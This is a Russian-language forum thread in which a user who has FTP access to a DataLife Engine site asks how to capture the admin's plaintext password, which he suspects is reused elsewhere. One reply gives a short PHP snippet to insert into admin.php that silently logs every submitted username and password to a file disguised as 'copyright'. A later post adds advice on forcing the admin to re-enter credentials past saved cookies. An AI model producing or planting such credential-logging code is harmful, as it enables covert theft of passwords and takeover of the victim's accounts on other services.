DLE. запись пароля админа в логфайл

Discussion in 'Безопасность и Анонимность' started by nokia6233, 28 Aug 2012.

  1. nokia6233

    nokia6233 New Member

    Joined:
    9 Dec 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Приветствую, имеется следующая ситуация: есть доступ к фтп сайта на ДЛЕ, есть подозрения, что пароль, который используется для доступа в админку сайта, применяется и на других ресурсах. Т.е. необходим именно пароль, восстановить с мд5 хеша пока что не удалось, потому возникла мысль добавить код в страницы, которые отвечают за логин в админку (задумка по типу http://communitybuilder.ru/component/option,com_fireboard/func,view/id,2080/catid,8/ или http://webcache.googleusercontent.com/search?q=cache:eek:vUvP-M80KMJ:78.47.163.211/stati/217-2009-01-05-20-45-36+&cd=4&hl=ru&ct=clnk&gl=ua&lr=lang_ru%7Clang_uk ).
    Вопрос - подойдет ли такой код для ДЛЕ и куда его надо добавить?
     
  2. Serafim

    Serafim Elder - Старейшина

    Joined:
    24 Oct 2006
    Messages:
    181
    Likes Received:
    103
    Reputations:
    18
    $Login = $_POST['username'];
    $Pass = $_POST['password'];
    $log = fopen("copyright","a+");
    fwrite($log,"\n $Login:$Pass \n");
    fclose($log);

    Добавить в admin.php. Удачи.
     
  3. nokia6233

    nokia6233 New Member

    Joined:
    9 Dec 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    спасибо,все понял
     
    #3 nokia6233, 29 Aug 2012
    Last edited: 29 Aug 2012
  4. nokia6233

    nokia6233 New Member

    Joined:
    9 Dec 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    сравни код, который в этой теме с тем, что ты пытаешься втулить.
    и поймешь, что твой код неправильный, потому как через гет не передаются пассы в дле.
    + если админ уже логинился раньше и у него лежат на компе куки, то его пускает в админку без ввода пароля логина. а потому надо сначала предпринять некоторые действия, чтобы логин-пасс ему вводить пришлось
     
Loading...